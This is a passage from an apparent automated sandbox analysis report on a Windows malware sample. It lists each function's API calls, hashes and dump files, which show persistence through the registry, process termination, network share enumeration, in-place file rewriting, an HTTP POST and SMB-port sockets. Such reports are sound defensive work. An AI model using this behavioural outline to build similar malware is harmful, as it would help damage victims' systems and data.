      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002044B3
      • EqualSid.ADVAPI32(?,?), ref: 002044D1
      • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 0020450C
      • GetLastError.KERNEL32 ref: 00204516
      • FreeSid.ADVAPI32(?), ref: 00204533
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$HeapInformation$AccountAllocAllocateCurrentEqualErrorFreeInitializeLastLookupOpen
      • String ID: }I
      • API String ID: 1407196647-3116234389
      • Opcode ID: 5c18452cbca282b78a7dd3b5bbaa5d1919967d927948a58e50fceb72b065ff07
      • Instruction ID: c5537eec473ded9223d2c1015bf15409395e9031503b2821fb1a9aebcc44d690
      • Opcode Fuzzy Hash: 5c18452cbca282b78a7dd3b5bbaa5d1919967d927948a58e50fceb72b065ff07
      • Instruction Fuzzy Hash: EB311BB2900309ABDB11EF94DD89EEEBBBDEB14345F90806AE601E2091D7309E559B61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00203CBD Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63COMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • WinHttpOpen.WINHTTP(0020A3C0,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00203CD3
      • WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00203CE7
      • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00203D08
      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00203D21
      • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00203D2D
      • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,00000000,00000000,00000000), ref: 00203D37
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00203D3C
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 00203D42
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Http$CloseHandle$OpenRequest$ConnectReceiveResponseSend
      • String ID: POST$t.
      • API String ID: 4150888541-2299521900
      • Opcode ID: 3960dee8d845ce7e81ea8f791e8ccb7b64395e39989c6de3673d30f5da5125e4
      • Instruction ID: 71397d9836d0918606f1a01d30269aa62721b8d7a090574670606093225d20b6
      • Opcode Fuzzy Hash: 3960dee8d845ce7e81ea8f791e8ccb7b64395e39989c6de3673d30f5da5125e4
      • Instruction Fuzzy Hash: 75111235902328BBCB215F62AC8CCDFBF7DEF4A7A0B404454F40992151D6348950DBE1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0020454B Relevance: 16.8, APIs: 11, Instructions: 256filelibraryloaderCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00203C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
        • Part of subcall function 00203A18: RegOpenKeyExW.ADVAPI32(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 00203A44
        • Part of subcall function 00203A18: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00203A60
        • Part of subcall function 00203A18: RegCloseKey.ADVAPI32(?), ref: 00203A79
      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 0020463C
      • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 0020464E
      • GetProcAddress.KERNEL32(00000000), ref: 00204655
      • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 002046E1
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 00204737
      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 0020475F
      • WriteFile.KERNEL32(?,?,00000208,?,00000000,?,?,?,?,00000000), ref: 0020478B
      • FlushFileBuffers.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 002047A3
      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 002047AD
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00203F86
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203F8F
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00203F98
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203F9B
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FA4
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203FA7
        • Part of subcall function 00203EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FB0
        • Part of subcall function 00203EE1: GetProcAddress.KERNEL32(00000000), ref: 00203FB3
        • Part of subcall function 00203EE1: GetCurrentProcessId.KERNEL32 ref: 00203FE6
        • Part of subcall function 00203EE1: OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00203FF3
        • Part of subcall function 00204325: CoInitializeEx.OLE32(00000000,00000006,?,74DF35B0,00000208,00000000,002047D7,?,00000000,?), ref: 0020437F
        • Part of subcall function 00204325: CoUninitialize.OLE32(?,?,?,?,?,?,74DF35B0,00000208,00000000,002047D7), ref: 002043B5
        • Part of subcall function 00203E9E: ShellExecuteExW.SHELL32(?), ref: 00203ED9
      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 002047FA
      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00204824
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$AddressFileModuleProc$Process$CloseCurrentOpenWrite$BuffersCreateDeleteExecuteFlushInformationInitializeObjectQueryShellSingleUninitializeValueVersionVolumeWait
      • String ID:
      • API String ID: 3832649910-0
      • Opcode ID: 26992a29be7bfc22f9a9fce28d9c0d4be0374996cc02f513ee2b405e9018150b
      • Instruction ID: eccd28b43fd4754335d19b1f0ec88002e128ec3ddceb6d9c6813f3882e53e4be
      • Opcode Fuzzy Hash: 26992a29be7bfc22f9a9fce28d9c0d4be0374996cc02f513ee2b405e9018150b
      • Instruction Fuzzy Hash: D59191B2418345AFD710AFA0DD46E5FBBE8EF88710F40492DF685921A2E771DA248F52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00201236 Relevance: 15.3, APIs: 10, Instructions: 287fileregistryCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
        • Part of subcall function 00205B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00205B3B,00000000,00000000,00000000,002037EB,00000000), ref: 00205B19
      • CopyFileW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0020137E
      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,?), ref: 002013A9
      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020106,?), ref: 002013EF
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 00201444
      • GetFileAttributesW.KERNEL32(00000000), ref: 0020144B
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0020145B
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 002014A8
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 002014CB
      • GetFileAttributesW.KERNEL32(00000000), ref: 002014D2
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 002014E2
        • Part of subcall function 00203A93: RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00201408,?,00000104,?,00201408,00000000,00000000), ref: 00203AA6
        • Part of subcall function 00203A93: RegCloseKey.ADVAPI32(?,?,00201408,00000000,00000000), ref: 00203AB2
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$AttributesCopy$HeapOpen$AllocCloseModuleNameProcessValue
      • String ID:
      • API String ID: 255945531-0
      • Opcode ID: 36df20e74d36d036121982ea035b7180216ae9add41ecc55332adec97191d0df
      • Instruction ID: 7a58b292234b0ae8cd6a1ae2cf47f838bc90512a671d022e39b12a27441f4b90
      • Opcode Fuzzy Hash: 36df20e74d36d036121982ea035b7180216ae9add41ecc55332adec97191d0df
      • Instruction Fuzzy Hash: 66914271D20319AADF11ABA4DC46BAE7BB9EF44311F200016F505B50E3DB75AEB09F60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002077DF Relevance: 15.1, APIs: 10, Instructions: 54timethreadCOMMON
      Download Yara Rule
      APIs
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0020D6A0,00000FA0,00000000,00000000,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 002077F2
      • EnterCriticalSection.KERNEL32(0020D6A0,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 002077F9
      • QueryPerformanceCounter.KERNEL32(002017C2,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207809
      • GetTickCount.KERNEL32 ref: 0020780B
      • GetCurrentProcessId.KERNEL32(?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207829
      • GetCurrentThreadId.KERNEL32 ref: 00207835
      • GetLocalTime.KERNEL32(?,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207845
      • SystemTimeToFileTime.KERNEL32(?,00000000,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207853
      • QueryPerformanceCounter.KERNEL32(002017C2,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 0020786F
      • LeaveCriticalSection.KERNEL32(0020D6A0,?,002078B7,00000000,00000000,00000000,?,002017C2,?), ref: 00207899
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSectionTime$CountCounterCurrentPerformanceQuery$EnterFileInitializeLeaveLocalProcessSpinSystemThreadTick
      • String ID:
      • API String ID: 1260023459-0
      • Opcode ID: 01024afbeb089eb243a2eae0c922dc9038e45ab7e5c78545d74c955ac02a3e5e
      • Instruction ID: 47668362d394f9901b3c0490139bc0bf7c7e7b981410804801d1ab49e17719ed
      • Opcode Fuzzy Hash: 01024afbeb089eb243a2eae0c922dc9038e45ab7e5c78545d74c955ac02a3e5e
      • Instruction Fuzzy Hash: A611A4719023189BCB04DBF8FD4DA8EBBFDEB48315B820566E10AD6122D735A5489F52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00204DEE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65processCOMMON
      Download Yara Rule
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00204E00
      • Process32FirstW.KERNEL32(Q# ,?), ref: 00204E38
      • OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 00204E68
      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00204E76
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00204E7F
      • Process32NextW.KERNEL32(?,?), ref: 00204E8E
      • CloseHandle.KERNEL32(?,?,?,?), ref: 00204E9C
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
      • String ID: Q#
      • API String ID: 2696918072-402180668
      • Opcode ID: 9849923e2135bfc18ccd2e0c90ea1b67f257327ed91dbe00c001c2a4f66ad1f2
      • Instruction ID: 4ddb9c6cc64d3252a18595d738385a8e52f1f9fbbcf9bb19569adb63ab93c526
      • Opcode Fuzzy Hash: 9849923e2135bfc18ccd2e0c90ea1b67f257327ed91dbe00c001c2a4f66ad1f2
      • Instruction Fuzzy Hash: C91181B1D01319AFDB10AFA4EC8CA9FBBBCEF48300F0040A5E904E2152D7749E558E90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00201E10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205shareCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 00201E66
      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00201E83
        • Part of subcall function 00205962: EnterCriticalSection.KERNEL32(?,00000000,00000000,00202E54), ref: 0020596A
        • Part of subcall function 00205962: LeaveCriticalSection.KERNEL32(?), ref: 00205973
      • WNetEnumResourceW.MPR(?,?,?,?), ref: 00202046
      • WNetCloseEnum.MPR(?), ref: 0020205E
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Enum$CriticalHeapResourceSection$AllocCloseEnterLeaveOpenProcess
      • String ID: \\?\UNC\\\e-
      • API String ID: 3929263231-4184602625
      • Opcode ID: 5fb0cf932c63a267e038596dfd797f28888537f7a7aa3d6cdf0f4f515cd0ed86
      • Instruction ID: 62ef254263ac4f966ebbd694bd20fba414773b877f208583ae4f47b367881ac2
      • Opcode Fuzzy Hash: 5fb0cf932c63a267e038596dfd797f28888537f7a7aa3d6cdf0f4f515cd0ed86
      • Instruction Fuzzy Hash: C261AD72114302EFDB21AF24DC49A2BBBAAAF94310F140819F855D61E3E731D9B9CB52
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00208C42 Relevance: 12.2, APIs: 8, Instructions: 207fileCOMMON
      Download Yara Rule
      APIs
      • MoveFileW.KERNEL32(?,?), ref: 00208CD3
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00208CF1
      • SetFilePointerEx.KERNEL32(00000001,?,?,?,00000002), ref: 00208E3F
      • WriteFile.KERNEL32(00000001,?,?,?,00000000), ref: 00208E59
      • SetEndOfFile.KERNEL32(00000001), ref: 00208E6F
        • Part of subcall function 00208AF1: SetFilePointerEx.KERNEL32(?,00000000,?,?,00000000), ref: 00208B28
        • Part of subcall function 00208AF1: WriteFile.KERNEL32(?,?,00040000,?,00000000), ref: 00208B3F
      • FlushFileBuffers.KERNEL32(00000001), ref: 00208E8E
      • CloseHandle.KERNEL32(?), ref: 00208E9E
      • MoveFileW.KERNEL32(?,?), ref: 00208EB0
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$MovePointerWrite$BuffersCloseCreateFlushHandle
      • String ID:
      • API String ID: 4283038262-0
      • Opcode ID: 05060edde094ea8c003b2475d3a6b43569fc07d5aada999477204ed7781efdff
      • Instruction ID: b2dacbd60be9e8f6572a2a985bb18f3b89e59656fc83f027dad2a794456bf0d3
      • Opcode Fuzzy Hash: 05060edde094ea8c003b2475d3a6b43569fc07d5aada999477204ed7781efdff
      • Instruction Fuzzy Hash: 87718F71A10309AFDF119FA4DC49BDF7BB9BF08300F044429F945E6292EB75AA64CB51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00208EBE Relevance: 12.1, APIs: 8, Instructions: 86fileCOMMON
      Download Yara Rule
      APIs
      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208ED8
      • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208EEE
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208EFD
      • GetFileAttributesW.KERNEL32(?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208F1B
      • SetFileAttributesW.KERNEL32(?,00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208F3C
        • Part of subcall function 00208782: GetFileAttributesW.KERNEL32(?), ref: 002087F3
        • Part of subcall function 00208782: GetFileAttributesW.KERNEL32(?), ref: 00208816
        • Part of subcall function 00208782: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00208835
        • Part of subcall function 00208782: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 0020885C
        • Part of subcall function 00208782: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0020888C
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00208F8F
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 00208F94
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00208F9C
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$Attributes$CloseCreateHandlePointer$Size
      • String ID:
      • API String ID: 3440144462-0
      • Opcode ID: 5ff8304bc954ab7d808e6ceadfd98818de516e9eebf66f045622b9046fd686ab
      • Instruction ID: 31bfbd72dcf4e32c01171bf453753ba1ce6ef44a5c75fcaeee11a88f8f1fa306
      • Opcode Fuzzy Hash: 5ff8304bc954ab7d808e6ceadfd98818de516e9eebf66f045622b9046fd686ab
      • Instruction Fuzzy Hash: A7315E7091030AAFDF119FB4DC88AAF7BBAEF04320F544115F955A26E2CB348A649B61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0020242F Relevance: 12.1, APIs: 8, Instructions: 64threadsleepsynchronizationCOMMON
      Download Yara Rule
      APIs
      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00202C15), ref: 00202444
      • CreateThread.KERNEL32(00000000,00000000,0020454B,00000000,00000000,00000000), ref: 0020245A
        • Part of subcall function 00204F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,00202C6F,00000001), ref: 00204F95
        • Part of subcall function 00204F7A: CloseHandle.KERNEL32(?,?,00202C6F,00000001), ref: 00204F9E
      • Sleep.KERNEL32(00000064), ref: 00202472
      • SetEvent.KERNEL32(00000000), ref: 00202486
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00202495
      • GetExitCodeThread.KERNEL32(?,?), ref: 002024A4
      • CloseHandle.KERNEL32(00000000), ref: 002024B1
      • CloseHandle.KERNEL32(?), ref: 002024B8
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateEventThread$CodeExitMutexObjectReleaseSingleSleepWait
      • String ID:
      • API String ID: 2313513115-0
      • Opcode ID: 5785ad8bf401359327730d7ea58a9bdfda0ae37fac6642ae0312b04c67967bf8
      • Instruction ID: 72d513e3d2013b04a57a9b1dd355b3b264272947179890d73aad44580c642f1c
      • Opcode Fuzzy Hash: 5785ad8bf401359327730d7ea58a9bdfda0ae37fac6642ae0312b04c67967bf8
      • Instruction Fuzzy Hash: 2511E135A10319FBD721AFA6AC8CEAFBF7DEBC5B50F504116F501A2182D6744904CA62
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00205376 Relevance: 9.0, APIs: 6, Instructions: 47synchronizationCOMMON
      Download Yara Rule
      APIs
      • LeaveCriticalSection.KERNEL32(00201FEB,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205387
      • WaitForSingleObject.KERNEL32(A0A815FF,000000FF,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 00205392
      • EnterCriticalSection.KERNEL32(00201FEB,00201FDB,00000000,00000000,002058E8,00000000,0000010C,00000000,00000000,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 0020539D
      • ResetEvent.KERNEL32(468B0020,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053B3
      • ResetEvent.KERNEL32(20A0A815,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053CA
      • LeaveCriticalSection.KERNEL32(00201FEB,?,00201FDB,00000000,0000010C,?,?,000000FF), ref: 002053D9
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeaveReset$EnterObjectSingleWait
      • String ID:
      • API String ID: 622437971-0
      • Opcode ID: 1dc4fc18febefd3d633556dd4f07628461a3743c30a31346bd67ef42214dd54d
      • Instruction ID: 7fe2e29b3828b2e47148386e636b8305875a7f2d9e791662dce4f7734a2f7c41
      • Opcode Fuzzy Hash: 1dc4fc18febefd3d633556dd4f07628461a3743c30a31346bd67ef42214dd54d
      • Instruction Fuzzy Hash: 9C017131211B26CBD7206F29EC44A17B7FEEF107E13214A69E596D35A2E3B0EC118F90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00205230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 0020525F
      • htonl.WS2_32(00000004), ref: 0020527C
      • htonl.WS2_32(00000004), ref: 00205287
      • htonl.WS2_32(?), ref: 0020528E
        • Part of subcall function 00205067: htons.WS2_32(000001BD), ref: 00205085
        • Part of subcall function 00205067: htonl.WS2_32(00000000), ref: 002050DB
        • Part of subcall function 00205067: socket.WS2_32(00000002,00000001,00000006), ref: 002050EC
